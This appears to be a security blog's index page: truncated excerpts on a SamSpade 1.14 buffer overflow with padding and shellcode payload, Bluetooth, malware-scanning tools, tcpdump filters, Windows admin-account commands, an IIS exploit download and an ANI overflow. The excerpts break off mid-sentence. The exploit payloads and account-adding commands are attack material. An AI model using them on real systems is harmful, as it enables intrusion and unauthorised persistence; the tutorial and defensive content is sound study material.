aLt's Security Blog

# Exploit Title: SAMSPADE 1.14 BUFFER OVERFLOW # Date: 10-12-2013 # Exploit Author: VISHAL MISHRA & NIDHI VERMA # Vendor Homepage: http://www.samspade.org/ # Software Link: http://www.majorgeeks.com/mg/getmirror/sam_spade,1.html # Version: 1.1.4 (beta) # Tested on: WINDOWS XP(sp2) TARGET: windows xp(sp2) ip:192.168.117.129 ATTACKER: backtrack     ip:192.168.117.131      PORT:443 Payload: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIITYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlXhM

Step1 : $hciconfig Like ifconfig and iwconfig for bluetooth we have hciconfig that enumerate bluetooth interfaces in an system with a little info about that card like MAC,MTU and interface name. hciconfig Step2 : $hciconfig -a hci0 So now we known we have a bluetooth interface card hci0.It may be anyone hci0,hci1 etc. Now as you can see below in the output that this bluetooth device is using OS name as its name own name. We will change this info so that some person might not enumerate any info about our bluetooth device.                                                Class is a 24 bit or 6 hex number based identity for bluetooth devices. Class entity defines that bluetooth device is of which hardware class i.e 1) 0x78020c is class of Phone/Smart phone, 2) 0x6e0100 is class of computer etc. Now will try to change this default class and name of our bluetooth device. hciconfig -a hci0 Step3:   $hciconfig -a hci0 features This command will tell what features our card

+------------------------------------------+ |           OfficeMalScanner v0.61         | |  Frank Boldewin / www.reconstructer.org  | +------------------------------------------+ Usage: -------- OfficeMalScanner <PPT, DOC or XLS file> <scan | info> <brute> <debug> Options: scan    - scan for several shellcode heuristics and encrypted PE-Files info    - dumps OLE structures, offsets+length and saves found VB-Macro code inflate - decompresses Ms Office 2007 documents, e.g. docx, into a temp dir Switches: (only enabled if option "scan" was selected) brute - enables the "brute force mode" to find encrypted stuff debug - prints out disassembly resp hexoutput if a heuristic was found If you use ubuntu with wine on it then type following command in terminal "wine cmd.exe" to reach a window prompt from where you can run OfficeMalScanner OfficeMalScanner Output OfficeMalScanner in Scan Mode OfficeMalScann

INSTALLATION: Required Dependencies(all these dependencies are present in jsunpack-n package in a folder named depend): 1) Build and install pynids (nids) from ./depends/pynids-0.6.1.tar.gz To compile pynids, you may need the following (ubuntu) packages: libpcap-dev pkg-config python-dev libgtk2.0-dev libnet1-dev         To install these package either use software center or command apt-get install PackageName     $ cd depends     $ tar xvfz pynids-0.6.1.tar.gz $ cd pynids-0.6.1/ directory $ python setup.py build $ sudo python setup.py install 2) Build SpiderMonkey 'js' from ./depends/js-1.8.0-rc1-src.tar.gz     This package has modifications to the spidermonkey source code; therefore, it is not recommended you use default smjs packages. (Details of the modifications are in INSTALL.spidermonkey.shellcode and INSTALL.spidermonkey, for historical purposes)     $ cd depends/     $ tar xvfz js-1.8.0-rc1-src.tar.gz     $ cd js-1.8.0-rc1-src     $ mak

Cyberoam Login # #  ('-.               .-') _                         ) (`-.               _  .-') #  ( OO ).-.          (  OO) )                         ( OO ).            ( \( -O ) #  / . --. / ,--.     /     '._     ,------.,--. ,--. (_/.  \_)-.  .----.  ,------. #  | \-.  \  |  |.-') |'--...__) ('-| _.---'|  | |  |  \  `.'  /  /  ..  \ |   /`. ' #.-'-'  |  | |  | OO )'--.  .--' (OO|(_\    |  | | .-') \     /\ .  /  \  .|  /  | | # \| |_.'  | |  |`-' |   |  |    /  |  '--. |  |_|( OO ) \   \ | |  |  '  ||  |_.' | #  |  .-.  |(|  '---.'   |  |    \_)|  .--' |  | | `-' /.'    \_)'  \  /  '|  .  '.' #  |  | |  | |      |    |  |      \|  |_) ('  '-'(_.-'/  .'.  \  \  `'  / |  |\  \ #  `--' `--' `------'    `--'       `--'     `-----'  '--'   '--'  `---''  `--' '--' # Cybera

Wireless Frame Format Using Tcpdump tcpdump -i <interface> -s 0 -nne 'wlan type <type> subtype <subtype>' Note older versions of tcpdump and wireshark capture filter dosn't support the "wlan" keyword, just use "type <type> subtype <subtype>" Sniffing wireless in monitor mode, ignore beacon's tcpdump -i <interface> -s 0 -nne '(type mgt or type ctl or type data) and (not type mgt subtype beacon)' type subtype mgt assoc-req assoc-resp reassoc-req reassoc-resp probe-req probe-resp beacon atim disassoc auth deauth ctl ps-poll rts cts ack cf-end cf-end-ack data data data-cf-ack data-cf-poll data-cf-ack-poll null cf-ack cf-poll cf-ack-poll qos-data qos-data-cf-ack qos-data-cf-poll qos-data-cf-ack-poll qos qos-cf-poll qos-cf-ack-poll Wlan Capture  Using Wireshark wlan.fc.type == 0 Management frames wlan.fc.type == 1 Control fram

Exploit Microsoft Windows 2000 IIS 5.0 IPP ISAPI Vulnerability Click Here  To Download 

Step1: To Install YARA on Ubuntu we need the PCRE and some libraries first:   sudo apt-get install libpcre3 libpcre3-dev   Then we start downloading the YARA source code: $ wget http://yara-project.googlecode.com/files/yara-1.4.tar.gz  $ wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz Step2:  Compile and install yara on your linux box.   a) cd yara-1.4     chmod +x -R /root/Desktop/yara-1.4/*    ./configure     make     make check     make install  b) cd ..     cd yara-python-1.4     python setup.py install Step 3: C onvert clamav database to yara http://code.google.com/p/malwarecookbook/source/browse/trunk/3/3/clamav_to_yara.py?r=5 sigtool -u /var/lib/clamav/main.cvd                                     // decompress the database python clamav_to_yara.py -f main.ndb -o clamav.yara    // convert clamav to yara Step 4: For packing signature(PEID tool uses these signature to detect type of packing) go to this site and copy pa

Install Clamav And Create Signatures   Step1: Install clamav in ubuntu by following simple steps given below: Edit /etc/apt/sources.list and add a line like this to it: deb http://volatile.debian.org/debian-volatile lenny/volatile main contrib non-free Then run apt-get update &&  apt-get install clamav If you need clamd, you may also want to run   apt-get install clamav-daemon Step2: CVD (ClamAV Virus Database) is a digitally signed container that includes signature databases in various text formats. The header of the container is a 512 bytes long string with colon separated fields: ClamAV-VDB:build time:version:number of signatures:functionalitylevel required:MD5 checksum:digital signature:builder name:build time (sec) sigtool --info displays detailed information about a given CVD file: Signature formats: MD5 The easiest way to create signatures for ClamAV is to use MD5 checksums, however this method can be only used against static malware. MD5, PE section b

When using a tool that displays network traffic a more natural (raw) way the burden of analysis is placed directly on the human rather than the application. This approach cultivates continued and elevated understanding of the TCP/IP suite, and for this reason I  strongly  advocate using  tcpdump  instead of other tools whenever possible. An anagram for the TCP flags:  U nskilled  A ttackers  P ester  R eal S ecurity  F olk  ] Show me all URGENT  (URG)  packets... # tcpdump  'tcp[13]  &   32 != 0 ' Show me all ACKNOWLEDGE  (ACK)  packets... # tcpdump  'tcp[13]  &   16 != 0 ' Show me all PUSH  (PSH)  packets... # tcpdump  'tcp[13]  &   8 != 0 ' Show me all RESET  (RST)  packets... # tcpdump  'tcp[13]  &   4 != 0 ' Show me all SYNCHRONIZE  (SYN)  packets... # tcpdump  'tcp[13]  &   2 != 0 ' Show me all FINISH  (FIN)  packets... # tcpdump  'tcp[13]

1: Find MAC address of all available interfaces :                     getmac 2: Find Version of windows Os:                     ver 3:  Find SID using Other method                     whoami /user 4: Find System Information                     systeminfo 5: find SID of window user                     wmic useraccount where name='vishal' get sid 6: Find about wireless adapter and access point available around you:                            netsh wlan show all

There are three different types of Cisco IOS passwords. 1) Cisco IOS type 0 passwords There is a command in Cisco IOS that can be issued to encrypt all passwords in the configuration file. If this command is not entered into the configuration file then all passwords (except for the enable secret password) will appear as plaintext as shown below: username admin privilege 15 password 0 cisco From the above lines in the Cisco IOS configuration file we can see that in this example the user admin has a password of cisco. The above passwords are noted as type 0 (zero) as shown by the zero that precedes the actual password. Type 0 passwords use no encryption. 2) Cisco IOS type 7 passwords  The command that is issued to encrypt user passwords is "service password-encryption" and this command should be entered from the Cisco router configuration mode prompt. If the "service password-encryption" command is issued then all type 0 (zero) passwords are become encrypted  use

1)  Command to Find Available users on a window box:     net user 2)  Command to add a new user account with a password:     net user /add  Lenny{username} mango{pass} 3)  Command to add an user account to administrator group:     net localgroup administrator Lenny /add 4)  To give the full administrator right to the user,use following command:     net share concfg*C:\/grant:useraccountname,full 5)  The following example adds a user account for a user whose full name is Jay Jamison and whose user  account name is jayj, with logon rights from 8 A.M. to 5 P.M., Monday through Friday (no spaces in time designations), a mandatory password (Cyk4^g3B), and the user's full name:  net user jayj Cyk4^g3B /add /passwordreq:yes /times:monday-friday,8am-5pm /fullname:"Jay  Jamison" 6)  The following example sets the logon time (8 A.M. to 5 P.M.) for Lenny by using 24-hour notation:     net user Lenny /time:M-F,08:00-17:00   7)  The following example set

With GS, DEP, ASLR, and protected mode IE7, it's possible to go ahead and write a functional proof of concept that will work on Vista and Xp also. When triggering the vulnerability on Vista with a complete overwrite of the return address, the register state looks something like this: eax=5f36476f ebx=0329f278 ecx=00000000 edx=00000000 esi=0329f1f0 edi=0329f1bc eip=41414141 esp=0329f1bc ebp=66ae6c41 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 41414141 ?? ??? One important point to note is that our malicious ani file contain two ani header one is good i.e of 36 byte and other is the bad boy that cause buffer overflow in LoadAniIcon function.The first is of 36 byte to make sure it passes the loadCursorIconfromFilemap function which checks the header of ani,but the problem is that it is called only once for a single file,if another ani header is encountered then instead of calling loadCursorIconfromFilemap loadAniIcon function  will be